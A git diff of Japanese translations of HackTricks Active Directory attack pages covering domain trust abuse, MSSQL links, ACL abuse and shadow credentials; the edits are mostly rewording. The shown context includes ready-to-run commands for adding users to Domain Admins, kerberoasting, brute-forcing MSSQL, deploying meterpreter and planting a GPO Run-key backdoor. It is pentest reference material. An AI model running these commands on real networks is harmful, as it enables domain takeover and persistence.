+- **ツリー根信頼**：これらの信頼は、フォレストルートドメインと新しく追加されたツリー根の間で自動的に確立されます。一般的には遭遇しませんが、ツリー根信頼は新しいドメインツリーをフォレストに追加するために重要であり、ユニークなドメイン名を維持し、双方向の推移性を確保します。詳細情報は[Microsoftのガイド](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)で確認できます。
 - **フォレスト信頼**：このタイプの信頼は、2つのフォレストルートドメイン間の双方向推移的信頼であり、セキュリティ対策を強化するためにSIDフィルタリングを強制します。
-- **MIT信頼**：これらの信頼は、非Windowsの[RFC4120準拠](https://tools.ietf.org/html/rfc4120)のKerberosドメインとの間で確立されます。MIT信頼は、Windowsエコシステム外のKerberosベースのシステムとの統合を必要とする環境に特化しています。
+- **MIT信頼**：これらの信頼は、非Windowsの[RF4120準拠](https://tools.ietf.org/html/rfc4120)のKerberosドメインとの間で確立されます。MIT信頼は、Windowsエコシステムの外部でKerberosベースのシステムとの統合を必要とする環境に特化しています。
 
 #### **信頼関係の他の違い**
 
-- 信頼関係は**推移的**（AがBを信頼し、BがCを信頼する場合、AはCを信頼する）または**非推移的**にすることができます。
+- 信頼関係は**推移的**（AがBを信頼し、BがCを信頼する場合、AはCを信頼する）または**非推移的**であることができます。
 - 信頼関係は**双方向信頼**（両方が互いに信頼する）または**一方向信頼**（一方だけが他方を信頼する）として設定できます。
 
 ### 攻撃パス
 
 1. **信頼関係を列挙**する
-2. どの**セキュリティプリンシパル**（ユーザー/グループ/コンピュータ）が**他のドメインのリソースにアクセス**できるかを確認します。おそらくACEエントリや他のドメインのグループにいることによって。**ドメイン間の関係**を探します（このために信頼が作成された可能性があります）。
+2. どの**セキュリティプリンシパル**（ユーザー/グループ/コンピュータ）が**他のドメインのリソースにアクセス**できるかを確認します。ACEエントリや他のドメインのグループにいることによって、**ドメイン間の関係**を探します（信頼がこのために作成された可能性があります）。
 1. この場合、kerberoastが別のオプションになる可能性があります。
-3. **アカウントを侵害**し、ドメインを**ピボット**することができます。
+3. **アカウントを侵害**し、ドメインを通じて**ピボット**します。
 
 攻撃者は、他のドメインのリソースにアクセスするために、主に3つのメカニズムを使用できます：
 
@@ -560,13 +584,13 @@ sid-history-injection.md
 
 Configuration Naming Context (NC)がどのように悪用されるかを理解することは重要です。Configuration NCは、Active Directory (AD)環境内のフォレスト全体の構成データの中央リポジトリとして機能します。このデータはフォレスト内のすべてのドメインコントローラー (DC) に複製され、書き込み可能なDCはConfiguration NCの書き込み可能なコピーを保持します。これを悪用するには、**DC上でSYSTEM権限を持つ必要があります**。できれば子DCが望ましいです。
 
-**GPOをルートDCサイトにリンク**
+**GPOをルートDCサイトにリンクする**
 
 Configuration NCのSitesコンテナには、ADフォレスト内のすべてのドメイン参加コンピュータのサイトに関する情報が含まれています。任意のDCでSYSTEM権限を持って操作することで、攻撃者はGPOをルートDCサイトにリンクできます。このアクションは、これらのサイトに適用されるポリシーを操作することによって、ルートドメインを危険にさらす可能性があります。
 
-詳細情報については、[SIDフィルタリングのバイパス](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)に関する研究を参照してください。
+詳細情報については、[SIDフィルタリングのバイパス](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)に関する研究を探ることができます。
 
-**フォレスト内の任意のgMSAを危険にさらす**
+**フォレスト内の任意のgMSAを妥協する**
 
 攻撃ベクトルは、ドメイン内の特権gMSAをターゲットにすることです。gMSAのパスワードを計算するために必要なKDS Rootキーは、Configuration NC内に保存されています。任意のDCでSYSTEM権限を持つことで、KDS Rootキーにアクセスし、フォレスト内の任意のgMSAのパスワードを計算することが可能です。
 
@@ -576,13 +600,13 @@ Configuration NCのSitesコンテナには、ADフォレスト内のすべての
 
 この方法は、新しい特権ADオブジェクトの作成を待つ忍耐が必要です。SYSTEM権限を持つ攻撃者は、ADスキーマを変更して、任意のユーザーにすべてのクラスに対する完全な制御を付与できます。これにより、新しく作成されたADオブジェクトへの不正アクセスと制御が可能になる可能性があります。
 
-さらなる読み物は、[スキーマ変更信頼攻撃](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)で利用可能です。
+さらなる読み物は、[スキーマ変更信頼攻撃](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)で利用できます。
 
-**ADCS ESC5を使用したDAからEAへの昇格**
+**ADCS ESC5を使用してDAからEAへ**
 
-ADCS ESC5の脆弱性は、フォレスト内の任意のユーザーとして認証を可能にする証明書テンプレートを作成するために、公開鍵基盤 (PKI) オブジェクトの制御をターゲットにしています。PKIオブジェクトはConfiguration NCに存在するため、書き込み可能な子DCを危険にさらすことでESC5攻撃を実行できます。
+ADCS ESC5の脆弱性は、フォレスト内の任意のユーザーとして認証を可能にする証明書テンプレートを作成するために、公開鍵基盤 (PKI) オブジェクトの制御をターゲットにしています。PKIオブジェクトはConfiguration NCに存在するため、書き込み可能な子DCを妥協することでESC5攻撃を実行できます。
 
-これに関する詳細は、[DAからEAへのESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)で読むことができます。ADCSがないシナリオでは、攻撃者は必要なコンポーネントを設定する能力を持ち、[子ドメイン管理者からエンタープライズ管理者への昇格](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/)で議論されています。
+この件に関する詳細は、[ESC5を使用してDAからEAへ](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)で読むことができます。ADCSがないシナリオでは、攻撃者は必要なコンポーネントを設定する能力を持ち、[子ドメイン管理者からエンタープライズ管理者への昇格](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/)で議論されています。
 
 ### 外部フォレストドメイン - 一方向（インバウンド）または双方向
 ```powershell
@@ -615,16 +639,16 @@ WhenChanged     : 2/19/2021 10:15:24 PM
 ```
 このシナリオでは、**あなたのドメイン**が**異なるドメイン**のプリンシパルに**特権**を**信頼**しています。
 
-しかし、**ドメインが信頼される**と、信頼されたドメインは**予測可能な名前**の**ユーザーを作成**し、**信頼されたパスワード**を**パスワード**として使用します。これは、**信頼するドメインのユーザーにアクセスして信頼されたドメインに入る**ことが可能であり、それを列挙してさらに特権を昇格させることができることを意味します：
+しかし、**ドメインが信頼される**と、信頼されたドメインは**予測可能な名前**の**ユーザーを作成**し、**信頼されたパスワード**を**パスワード**として使用します。これは、**信頼するドメインのユーザーにアクセスして信頼されたドメインに入る**ことが可能であり、それを列挙し、さらに特権を昇格させることを意味します：
 
 {{#ref}}
 external-forest-domain-one-way-outbound.md
 {{#endref}}
 
-信頼されたドメインを侵害する別の方法は、ドメイン信頼の**反対方向**に作成された[**SQL信頼リンク**](abusing-ad-mssql.md#mssql-trusted-links)を見つけることです（これはあまり一般的ではありません）。
+信頼されたドメインを侵害する別の方法は、ドメイン信頼の**逆方向**に作成された[**SQL信頼リンク**](abusing-ad-mssql.md#mssql-trusted-links)を見つけることです（これはあまり一般的ではありません）。
 
-信頼されたドメインを侵害する別の方法は、**信頼されたドメインのユーザーがアクセスできる**マシンで待機し、**RDP**を介してログインすることです。次に、攻撃者はRDPセッションプロセスにコードを注入し、そこから**被害者の元のドメインにアクセス**することができます。\
-さらに、**被害者がハードドライブをマウントしている場合**、攻撃者は**RDPセッション**プロセスから**ハードドライブのスタートアップフォルダー**に**バックドア**を保存することができます。この技術は**RDPInception**と呼ばれます。
+信頼されたドメインを侵害する別の方法は、**信頼されたドメインのユーザーがアクセスできる**マシンで待機し、**RDP**を介してログインすることです。次に、攻撃者はRDPセッションプロセスにコードを注入し、そこから**被害者の元のドメインにアクセス**できます。\
+さらに、**被害者がハードドライブをマウントした場合**、攻撃者は**RDPセッション**プロセスから**ハードドライブのスタートアップフォルダー**に**バックドア**を保存できます。この技術は**RDPInception**と呼ばれます。
 
 {{#ref}}
 rdp-sessions-abuse.md
@@ -634,13 +658,13 @@ rdp-sessions-abuse.md
 
 ### **SIDフィルタリング：**
 
-- フォレスト信頼を越えたSID履歴属性を利用した攻撃のリスクは、SIDフィルタリングによって緩和され、これはすべてのインターフォレスト信頼でデフォルトで有効になっています。これは、マイクロソフトの見解に従い、フォレストをセキュリティ境界と見なすことから、イントラフォレスト信頼が安全であるという前提に基づいています。
-- しかし、注意点があります：SIDフィルタリングはアプリケーションやユーザーアクセスを妨げる可能性があり、そのため時折無効にされることがあります。
+- SID履歴属性を利用した攻撃のリスクは、すべてのインターフォレスト信頼でデフォルトで有効になっているSIDフィルタリングによって緩和されます。これは、マイクロソフトの見解に従い、フォレストをセキュリティ境界と見なすことから、イントラフォレスト信頼が安全であるという前提に基づいています。
+- しかし、注意が必要です：SIDフィルタリングはアプリケーションやユーザーアクセスに影響を与える可能性があり、そのため時折無効にされることがあります。
 
 ### **選択的認証：**
 
 - インターフォレスト信頼の場合、選択的認証を使用することで、2つのフォレストのユーザーが自動的に認証されないようにします。代わりに、信頼するドメインまたはフォレスト内のドメインやサーバーにアクセスするためには明示的な権限が必要です。
-- これらの対策は、書き込み可能な構成名コンテキスト（NC）の悪用や信頼アカウントへの攻撃から保護するものではないことに注意が必要です。
+- これらの対策は、書き込み可能な構成命名コンテキスト（NC）の悪用や信頼アカウントへの攻撃から保護するものではないことに注意が必要です。
 
 [**ired.teamのドメイン信頼に関する詳細情報。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
 
@@ -660,20 +684,20 @@ rdp-sessions-abuse.md
 
 ### **欺瞞技術の実装**
 
-- 欺瞞を実装するには、パスワードが期限切れにならないか、委任のために信頼されているとマークされたデコイユーザーやコンピュータのような罠を設定します。詳細なアプローチには、特定の権利を持つユーザーを作成するか、高特権グループに追加することが含まれます。
+- 欺瞞を実装するには、パスワードが期限切れにならないか、委任のために信頼されているとマークされたデコイユーザーやコンピュータのような罠を設定します。詳細なアプローチには、特定の権利を持つユーザーを作成したり、高特権グループに追加したりすることが含まれます。
 - 実用的な例として、次のようなツールを使用します：`Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
 - 欺瞞技術の展開に関する詳細は、[Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception)で確認できます。
 
 ### **欺瞞の特定**
 
-- **ユーザーオブジェクトの場合**：疑わしい指標には、異常なObjectSID、まれなログオン、作成日、低い不正パスワードカウントが含まれます。
-- **一般的な指標**：潜在的なデコイオブジェクトの属性を本物のものと比較することで不一致を明らかにできます。[HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)のようなツールは、こうした欺瞞を特定するのに役立ちます。
+- **ユーザーオブジェクトの場合**：疑わしい指標には、異常なObjectSID、稀なログオン、作成日、低い不正パスワードカウントが含まれます。
+- **一般的な指標**：潜在的なデコイオブジェクトの属性を本物のものと比較することで不一致を明らかにできます。[HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)のようなツールが、こうした欺瞞を特定するのに役立ちます。
 
 ### **検出システムの回避**
 
 - **Microsoft ATA検出回避**：
 - **ユーザー列挙**：ドメインコントローラーでのセッション列挙を避け、ATA検出を防ぎます。
-- **チケットの偽装**：チケット作成に**aes**キーを利用することで、NTLMにダウングレードせずに検出を回避します。
+- **チケットの偽装**：チケット作成に**aes**キーを使用することで、NTLMにダウングレードせずに検出を回避します。
 - **DCSync攻撃**：ATA検出を避けるために、ドメインコントローラーから直接実行するのではなく、非ドメインコントローラーから実行することが推奨されます。
 
 ## 参考文献
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 166e29e3f..2e0ca626e 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -79,7 +79,7 @@ mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
 mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
 
 ```
-### ドメインセッションなしでのネットワークからの列挙
+### ドメインセッションなしでネットワークから列挙する
 ```
 
 # Interactive mode
@@ -202,13 +202,13 @@ metasploitを使用して、信頼できるリンクを簡単に確認できま
 msf> use exploit/windows/mssql/mssql_linkcrawler
 [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```
-メタスプリットはMSSQLの`openquery()`関数のみを悪用しようとすることに注意してください（したがって、`openquery()`でコマンドを実行できない場合は、コマンドを実行するために`EXECUTE`メソッドを**手動で**試す必要があります。詳細は以下を参照してください。）
+注意してください、metasploitはMSSQLの`openquery()`関数のみを悪用しようとします（したがって、`openquery()`でコマンドを実行できない場合は、コマンドを実行するために`EXECUTE`メソッドを**手動で**試す必要があります。詳細は以下を参照してください。）
 
 ### 手動 - Openquery()
 
 **Linux**からは、**sqsh**と**mssqlclient.py**を使用してMSSQLコンソールシェルを取得できます。
 
-**Windows**からも、リンクを見つけて手動でコマンドを実行することができる**MSSQLクライアントのような** [**HeidiSQL**](https://www.heidisql.com)を使用できます。
+**Windows**からも、リンクを見つけて手動でコマンドを実行することができる**MSSQLクライアントのような**[**HeidiSQL**](https://www.heidisql.com)を使用できます。
 
 _Windows認証を使用してログイン：_
 
@@ -256,7 +256,6 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
 
 多くの著者が考案した戦略は、攻撃者が作成した悪意のあるまたは中間者サービスにSYSTEMサービスを認証させることです。この悪意のあるサービスは、認証を試みている間にSYSTEMサービスを偽装することができます。
 
-[SweetPotato](https://github.com/CCob/SweetPotato)は、Beaconの`execute-assembly`コマンドを介して実行できるこれらのさまざまな技術のコレクションを持っています。
-
+[SweetPotato](https://github.com/CCob/SweetPotato)には、Beaconの`execute-assembly`コマンドを介して実行できるこれらのさまざまな技術のコレクションがあります。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index 216023559..5e12002ec 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -2,14 +2,14 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**このページは主に** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **および** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**の技術の要約です。詳細については、元の記事を確認してください。**
+**このページは主に** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **および** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**からの技術の概要です。詳細については、元の記事を確認してください。**
 
 ## **ユーザーに対するGenericAll権限**
 
-この権限は、攻撃者にターゲットユーザーアカウントに対する完全な制御を与えます。`Get-ObjectAcl`コマンドを使用して`GenericAll`権限が確認されると、攻撃者は次のことができます：
+この権限は、攻撃者にターゲットユーザーアカウントに対する完全な制御を与えます。`Get-ObjectAcl`コマンドを使用して`GenericAll`権限が確認されると、攻撃者は以下を行うことができます：
 
 - **ターゲットのパスワードを変更**: `net user <username> <password> /domain`を使用して、攻撃者はユーザーのパスワードをリセットできます。
-- **ターゲット化されたKerberoasting**: ユーザーアカウントにSPNを割り当ててkerberoastableにし、次にRubeusとtargetedKerberoast.pyを使用してチケット授与チケット（TGT）ハッシュを抽出し、クラックを試みます。
+- **ターゲット化されたKerberoasting**: ユーザーのアカウントにSPNを割り当ててkerberoastableにし、次にRubeusとtargetedKerberoast.pyを使用してチケット授与チケット（TGT）ハッシュを抽出し、クラックを試みます。
 ```powershell
 Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
 .\Rubeus.exe kerberoast /user:<username> /nowrap
@@ -21,9 +21,9 @@ Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
 ```
 ## **GenericAll権限のグループ**
 
-この特権により、攻撃者は`Domain Admins`のようなグループに対して`GenericAll`権限を持っている場合、グループメンバーシップを操作することができます。`Get-NetGroup`を使用してグループの識別名を特定した後、攻撃者は次のことができます：
+この特権により、攻撃者は`Domain Admins`のようなグループに`GenericAll`権限を持っている場合、グループメンバーシップを操作することができます。`Get-NetGroup`を使用してグループの識別名を特定した後、攻撃者は次のことができます：
 
-- **自分をDomain Adminsグループに追加する**：これは、直接コマンドを使用するか、Active DirectoryやPowerSploitのようなモジュールを使用して行うことができます。
+- **自分自身をDomain Adminsグループに追加する**：これは、直接コマンドを使用するか、Active DirectoryやPowerSploitのようなモジュールを使用して行うことができます。
 ```powershell
 net group "domain admins" spotless /add /domain
 Add-ADGroupMember -Identity "domain admins" -Members spotless
@@ -38,9 +38,9 @@ Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.
 
 ## **WriteProperty on Group**
 
-ユーザーが特定のグループ（例：`Domain Admins`）のすべてのオブジェクトに対して`WriteProperty`権限を持っている場合、以下が可能です：
+特定のグループ（例：`Domain Admins`）のすべてのオブジェクトに対して`WriteProperty`権利を持つユーザーは、以下を行うことができます：
 
-- **Add Themselves to the Domain Admins Group**: `net user`と`Add-NetGroupUser`コマンドを組み合わせることで達成可能であり、この方法はドメイン内での権限昇格を可能にします。
+- **自分自身をDomain Adminsグループに追加する**: `net user`と`Add-NetGroupUser`コマンドを組み合わせることで達成可能で、この方法はドメイン内での権限昇格を可能にします。
 ```powershell
 net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 ```
@@ -72,7 +72,7 @@ rpcclient -U KnownUsername 10.10.10.192
 ```
 ## **グループのWriteOwner**
 
-攻撃者がグループに対して`WriteOwner`権限を持っていることが判明した場合、彼らはそのグループの所有権を自分自身に変更することができます。これは、問題のグループが`Domain Admins`である場合に特に影響が大きく、所有権を変更することでグループの属性やメンバーシップに対するより広範な制御が可能になります。このプロセスには、`Get-ObjectAcl`を使用して正しいオブジェクトを特定し、その後`Set-DomainObjectOwner`を使用して所有者をSIDまたは名前で変更することが含まれます。
+攻撃者がグループに対して`WriteOwner`権限を持っていることがわかった場合、彼らはそのグループの所有権を自分自身に変更することができます。これは、問題のグループが`Domain Admins`である場合に特に影響が大きく、所有権を変更することでグループの属性やメンバーシップに対するより広範な制御が可能になります。このプロセスは、`Get-ObjectAcl`を使用して正しいオブジェクトを特定し、その後`Set-DomainObjectOwner`を使用して、SIDまたは名前で所有者を変更することを含みます。
 ```powershell
 Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
 Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
@@ -86,7 +86,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\
 ```
 ## **GenericWrite on Group**
 
-この特権を持つ攻撃者は、特定のグループに自分自身や他のユーザーを追加するなど、グループメンバーシップを操作できます。このプロセスには、資格情報オブジェクトを作成し、それを使用してグループからユーザーを追加または削除し、PowerShellコマンドでメンバーシップの変更を確認することが含まれます。
+この特権を持つ攻撃者は、特定のグループに自分自身や他のユーザーを追加するなど、グループメンバーシップを操作できます。このプロセスには、資格情報オブジェクトを作成し、それを使用してユーザーをグループに追加または削除し、PowerShellコマンドでメンバーシップの変更を確認することが含まれます。
 ```powershell
 $pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
@@ -106,7 +106,7 @@ $ADSI.psbase.commitchanges()
 ```
 ## **ドメイン上のレプリケーション (DCSync)**
 
-DCSync攻撃は、ドメイン上の特定のレプリケーション権限を利用して、ドメインコントローラーを模倣し、ユーザーの資格情報を含むデータを同期します。この強力な技術は、`DS-Replication-Get-Changes`のような権限を必要とし、攻撃者がドメインコントローラーへの直接アクセスなしにAD環境から機密情報を抽出することを可能にします。[**DCSync攻撃の詳細はこちら。**](../dcsync.md)
+DCSync攻撃は、ドメイン上の特定のレプリケーション権限を利用して、ドメインコントローラーを模倣し、ユーザーの資格情報を含むデータを同期します。この強力な手法は、`DS-Replication-Get-Changes`のような権限を必要とし、攻撃者がドメインコントローラーへの直接アクセスなしにAD環境から機密情報を抽出することを可能にします。[**DCSync攻撃の詳細はこちら。**](../dcsync.md)
 
 ## GPO委任 <a href="#gpo-delegation" id="gpo-delegation"></a>
 
@@ -122,7 +122,7 @@ DCSync攻撃は、ドメイン上の特定のレプリケーション権限を
 
 **特定のコンピュータに適用されたポリシー**: 特定のコンピュータに適用されているポリシーを確認するには、`Get-DomainGPO`のようなコマンドを利用できます。
 
-**特定のポリシーが適用されたOU**: 特定のポリシーに影響を受ける組織単位 (OU) を特定するには、`Get-DomainOU`を使用できます。
+**特定のポリシーが適用されたOU**: 特定のポリシーの影響を受ける組織単位 (OU) を特定するには、`Get-DomainOU`を使用できます。
 
 ### GPOの悪用 - New-GPOImmediateTask
 
@@ -130,9 +130,9 @@ DCSync攻撃は、ドメイン上の特定のレプリケーション権限を
 ```powershell
 New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
 ```
-### GroupPolicy モジュール - GPOの悪用
+### GroupPolicyモジュール - GPOの悪用
 
-GroupPolicy モジュールがインストールされている場合、新しい GPO の作成とリンク、影響を受けたコンピュータでバックドアを実行するためのレジストリ値などの設定が可能です。この方法では、GPO を更新し、実行のためにユーザーがコンピュータにログインする必要があります。
+GroupPolicyモジュールがインストールされている場合、新しいGPOの作成とリンク、影響を受けたコンピュータでバックドアを実行するためのレジストリ値などの設定が可能です。この方法では、GPOを更新し、実行のためにユーザーがコンピュータにログインする必要があります。
 ```powershell
 New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
 Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
@@ -149,15 +149,15 @@ GPOの更新は通常90分ごとに行われます。このプロセスを迅速
 
 ### 背景
 
-特定のGPO、例えば`Misconfigured Policy`のスケジュールされたタスクを検査すると、`evilTask`のようなタスクの追加が確認できます。これらのタスクは、システムの動作を変更したり、特権を昇格させたりすることを目的としたスクリプトやコマンドラインツールを通じて作成されます。
+特定のGPO、例えば`Misconfigured Policy`のスケジュールされたタスクを検査すると、`evilTask`のようなタスクの追加が確認できます。これらのタスクは、システムの動作を変更したり特権を昇格させたりすることを目的としたスクリプトやコマンドラインツールを通じて作成されます。
 
-`New-GPOImmediateTask`によって生成されたXML構成ファイルに示されているタスクの構造は、実行されるコマンドやそのトリガーを含むスケジュールされたタスクの詳細を概説しています。このファイルは、GPO内でスケジュールされたタスクがどのように定義され、管理されるかを示しており、ポリシーの強制の一環として任意のコマンドやスクリプトを実行する方法を提供します。
+`New-GPOImmediateTask`によって生成されたXML構成ファイルに示されているタスクの構造は、スケジュールされたタスクの具体的な内容を示しています - 実行されるコマンドやそのトリガーを含みます。このファイルは、GPO内でスケジュールされたタスクがどのように定義され管理されるかを表しており、ポリシーの強制の一環として任意のコマンドやスクリプトを実行する方法を提供します。
 
 ### ユーザーとグループ
 
-GPOは、ターゲットシステム上のユーザーおよびグループのメンバーシップを操作することも可能です。ユーザーとグループのポリシーファイルを直接編集することで、攻撃者はローカルの`administrators`グループなどの特権グループにユーザーを追加できます。これは、GPO管理権限の委任を通じて可能であり、新しいユーザーを含めたり、グループメンバーシップを変更したりするためのポリシーファイルの修正を許可します。
+GPOは、ターゲットシステム上のユーザーおよびグループのメンバーシップを操作することも可能です。ユーザーとグループのポリシーファイルを直接編集することで、攻撃者はローカルの`administrators`グループなどの特権グループにユーザーを追加できます。これは、GPO管理権限の委任を通じて可能であり、ポリシーファイルを修正して新しいユーザーを含めたりグループメンバーシップを変更したりすることを許可します。
 
-ユーザーとグループのXML構成ファイルは、これらの変更がどのように実施されるかを概説しています。このファイルにエントリを追加することで、特定のユーザーに影響を受けたシステム全体で昇格された特権を付与することができます。この方法は、GPO操作を通じた特権昇格の直接的なアプローチを提供します。
+ユーザーとグループのXML構成ファイルは、これらの変更がどのように実施されるかを示しています。このファイルにエントリを追加することで、特定のユーザーに影響を受けるシステム全体で特権を付与することができます。この方法は、GPO操作を通じた特権昇格の直接的なアプローチを提供します。
 
 さらに、ログオン/ログオフスクリプトの活用、オートランのためのレジストリキーの変更、.msiファイルを介したソフトウェアのインストール、サービス構成の編集など、コードを実行したり持続性を維持したりするための追加の方法も考慮できます。これらの技術は、GPOの悪用を通じてターゲットシステムへのアクセスを維持し、制御するためのさまざまな手段を提供します。
 
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
index 987b23d33..414dc8c72 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -6,9 +6,9 @@
 
 **この技術に関する[すべての情報を元の投稿で確認してください](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)。**
 
-**要約**: ユーザー/コンピュータの**msDS-KeyCredentialLink**プロパティに書き込むことができれば、そのオブジェクトの**NTハッシュを取得**できます。
+**要約**: ユーザー/コンピュータの**msDS-KeyCredentialLink**プロパティに書き込むことができれば、そのオブジェクトの**NTハッシュ**を取得できます。
 
-投稿では、ターゲットのNTLMハッシュを含むユニークな**サービスチケット**を取得するために、**公開鍵-秘密鍵認証資格情報**を設定する方法が概説されています。このプロセスには、復号可能な特権属性証明書（PAC）内の暗号化されたNTLM_SUPPLEMENTAL_CREDENTIALが含まれます。
+投稿では、ターゲットのNTLMハッシュを含むユニークな**サービスチケット**を取得するための**公開鍵-秘密鍵認証資格情報**を設定する方法が概説されています。このプロセスには、復号可能なPrivilege Attribute Certificate (PAC)内の暗号化されたNTLM_SUPPLEMENTAL_CREDENTIALが含まれます。
 
 ### 要件
 
@@ -26,13 +26,13 @@
 1. 意図したホスト上で特権ユーザーとして機能するための**RC4シルバーチケット**を作成すること。
 2. **S4U2Self**を使用して**特権ユーザー**のなりすましを行うために、サービス名にサービスクラスを追加するためにサービスチケットを変更する必要があります。
 
-Key Trustの悪用の大きな利点は、攻撃者が生成した秘密鍵に制限されているため、潜在的に脆弱なアカウントへの委任を避け、削除が難しいコンピュータアカウントの作成を必要としないことです。
+Key Trustの悪用の大きな利点は、攻撃者が生成した秘密鍵に制限され、潜在的に脆弱なアカウントへの委任を回避し、削除が難しいコンピュータアカウントの作成を必要としないことです。
 
 ## Tools
 
 ### [**Whisker**](https://github.com/eladshamir/Whisker)
 
-これは、攻撃のためのC#インターフェースを提供するDSInternalsに基づいています。WhiskerとそのPythonの対応ツールである**pyWhisker**は、ターゲットオブジェクトからActive Directoryアカウントを制御するために`msDS-KeyCredentialLink`属性を操作することを可能にします。これらのツールは、ターゲットオブジェクトからキー資格情報を追加、リスト、削除、クリアするなど、さまざまな操作をサポートしています。
+これは、攻撃のためのC#インターフェースを提供するDSInternalsに基づいています。WhiskerとそのPythonの対応ツールである**pyWhisker**は、ターゲットオブジェクトの`msDS-KeyCredentialLink`属性を操作してActive Directoryアカウントを制御することを可能にします。これらのツールは、ターゲットオブジェクトからのキー資格情報の追加、リスト表示、削除、クリアなど、さまざまな操作をサポートしています。
 
 **Whisker**の機能には以下が含まれます：
 
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md
index c692f23c9..a8bfb96fa 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -7,13 +7,13 @@
 ### Components of a Certificate
 
 - **証明書の主題**はその所有者を示します。
-- **公開鍵**は、証明書を正当な所有者にリンクするために、プライベートキーとペアになっています。
+- **公開鍵**は、証明書を正当な所有者にリンクするために、プライベートキーとペアになります。
 - **有効期間**は、**NotBefore**および**NotAfter**の日付によって定義され、証明書の有効な期間を示します。
 - 一意の**シリアル番号**は、証明書機関（CA）によって提供され、各証明書を識別します。
 - **発行者**は、証明書を発行したCAを指します。
 - **SubjectAlternativeName**は、主題の追加名を許可し、識別の柔軟性を高めます。
 - **基本制約**は、証明書がCA用かエンドエンティティ用かを識別し、使用制限を定義します。
-- **拡張キー使用法（EKU）**は、オブジェクト識別子（OID）を通じて、コード署名やメール暗号化など、証明書の特定の目的を区別します。
